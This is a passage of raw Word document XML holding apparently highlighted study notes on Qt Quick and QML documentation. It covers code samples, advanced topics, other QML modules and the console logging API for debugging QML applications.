      </w:hyperlink>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> pages.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="0008522D" w:rsidRDefault="00C10CB8" w:rsidP="0008522D">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2699" w:name="code-samples-and-demos"/>
      <w:bookmarkStart w:id="2700" w:name="_Toc483001120"/>
      <w:bookmarkStart w:id="2701" w:name="_Toc483004089"/>
      <w:bookmarkStart w:id="2702" w:name="_Toc483604453"/>
      <w:bookmarkStart w:id="2703" w:name="_Toc483605673"/>
      <w:bookmarkEnd w:id="2699"/>
      <w:r w:rsidRPr="0008522D">
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Code Samples and Demos</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2700"/>
      <w:bookmarkEnd w:id="2701"/>
      <w:bookmarkEnd w:id="2702"/>
      <w:bookmarkEnd w:id="2703"/>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 xml:space="preserve">To learn more about uses of QML code, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA728F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>there are several code samples which show how QML types are used</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. In addition, there are s</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA728F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>everal demos which show how QML code is used</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in applications.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="00C10CB8" w:rsidRDefault="00490E7E" w:rsidP="00C10CB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="99"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId3000" w:history="1">
        <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Getting Started Programming with Qt Quick</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> - a tutorial showing the creation of a simple QML text editor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="00C10CB8" w:rsidRDefault="00490E7E" w:rsidP="00C10CB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="99"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId3001" w:history="1">
        <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Qt Quick Examples and Tutorials</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="00C10CB8" w:rsidRDefault="00C10CB8" w:rsidP="00CA728F">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2704" w:name="advanced-application-development-topics"/>
      <w:bookmarkStart w:id="2705" w:name="_Toc483001121"/>
      <w:bookmarkStart w:id="2706" w:name="_Toc483004090"/>
      <w:bookmarkStart w:id="2707" w:name="_Toc483604454"/>
      <w:bookmarkStart w:id="2708" w:name="_Toc483605674"/>
      <w:bookmarkEnd w:id="2704"/>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Advanced Application Development Topics</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2705"/>
      <w:bookmarkEnd w:id="2706"/>
      <w:bookmarkEnd w:id="2707"/>
      <w:bookmarkEnd w:id="2708"/>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="00C10CB8" w:rsidRDefault="00490E7E" w:rsidP="00C10CB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId3002" w:history="1">
        <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Deploying QML Applic</w:t>
        </w:r>
        <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>a</w:t>
        </w:r>
        <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>tions</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="00C10CB8" w:rsidRDefault="00490E7E" w:rsidP="00C10CB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId3003" w:history="1">
        <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Performance Consider</w:t>
        </w:r>
        <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>a</w:t>
        </w:r>
        <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>tions and Suggestions</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="00C10CB8" w:rsidRDefault="00490E7E" w:rsidP="00C10CB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId3004" w:history="1">
        <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Internationalization and L</w:t>
        </w:r>
        <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>o</w:t>
        </w:r>
        <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>calization</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="00C10CB8" w:rsidRDefault="00C10CB8" w:rsidP="00C10CB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Testing and Debugging</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="00C10CB8" w:rsidRDefault="00490E7E" w:rsidP="00C10CB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId3005" w:history="1">
        <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Prototyping wit</w:t>
        </w:r>
        <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>h</w:t>
        </w:r>
        <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t xml:space="preserve"> qmlscene</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="00C10CB8" w:rsidRDefault="00490E7E" w:rsidP="00C10CB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId3006" w:history="1">
        <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Debugging QML A</w:t>
        </w:r>
        <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>p</w:t>
        </w:r>
        <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>plications</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="00C10CB8" w:rsidRDefault="00490E7E" w:rsidP="00C10CB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId3007" w:history="1">
        <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick Test: QML Unit Testing Framework</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="0008522D" w:rsidRDefault="00C10CB8" w:rsidP="0008522D">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2709" w:name="other-qml-modules"/>
      <w:bookmarkStart w:id="2710" w:name="_Toc483001122"/>
      <w:bookmarkStart w:id="2711" w:name="_Toc483004091"/>
      <w:bookmarkStart w:id="2712" w:name="_Toc483604455"/>
      <w:bookmarkStart w:id="2713" w:name="_Toc483605675"/>
      <w:bookmarkEnd w:id="2709"/>
      <w:r w:rsidRPr="0008522D">
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Other QML Modules</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2710"/>
      <w:bookmarkEnd w:id="2711"/>
      <w:bookmarkEnd w:id="2712"/>
      <w:bookmarkEnd w:id="2713"/>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 xml:space="preserve">Qt Quick only provides </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA728F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>basic visual types and much of Qt's functionality is exposed to QML through other modules</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. If you require the functionality of those modules, you should browse their QML documentation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="00C10CB8" w:rsidRDefault="00C10CB8" w:rsidP="00C10CB8">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The </w:t>
      </w:r>
      <w:hyperlink r:id="rId3008" w:history="1">
        <w:r w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>All QML APIs by Module</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> contains a list of all QML modules in Qt 5.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="00C10CB8" w:rsidRDefault="00C10CB8" w:rsidP="00C10CB8">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2714" w:name="related-topics"/>
      <w:bookmarkEnd w:id="2714"/>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Related Topics</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="00162275" w:rsidRDefault="00490E7E" w:rsidP="00C10CB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId3009" w:history="1">
        <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Porting QML Applications to Qt 5</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00162275" w:rsidRPr="00C10CB8" w:rsidRDefault="00162275" w:rsidP="00162275">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00162275" w:rsidRDefault="00162275" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId3010" w:history="1">
        <w:r w:rsidRPr="00AA66ED">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qtquick-debugging.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00162275" w:rsidRPr="00162275" w:rsidRDefault="00162275" w:rsidP="00162275">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2715" w:name="_Toc483604456"/>
      <w:bookmarkStart w:id="2716" w:name="_Toc483605676"/>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Debugging QML Applications</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2715"/>
      <w:bookmarkEnd w:id="2716"/>
    </w:p>
    <w:p w:rsidR="00162275" w:rsidRPr="00162275" w:rsidRDefault="00162275" w:rsidP="00162275">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2717" w:name="details"/>
      <w:bookmarkStart w:id="2718" w:name="console-api"/>
      <w:bookmarkStart w:id="2719" w:name="_Toc483604457"/>
      <w:bookmarkStart w:id="2720" w:name="_Toc483605677"/>
      <w:bookmarkEnd w:id="2717"/>
      <w:bookmarkEnd w:id="2718"/>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Console API</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2719"/>
      <w:bookmarkEnd w:id="2720"/>
    </w:p>
    <w:p w:rsidR="00162275" w:rsidRPr="00162275" w:rsidRDefault="00162275" w:rsidP="00162275">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2721" w:name="log"/>
      <w:bookmarkStart w:id="2722" w:name="_Toc483604458"/>
      <w:bookmarkStart w:id="2723" w:name="_Toc483605678"/>
      <w:bookmarkEnd w:id="2721"/>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Log</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2722"/>
      <w:bookmarkEnd w:id="2723"/>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3613F0">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>console.log</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, console.debug, console.info, console.warn and console.error</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be used to </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>print debugging information to the console</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. For example:</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
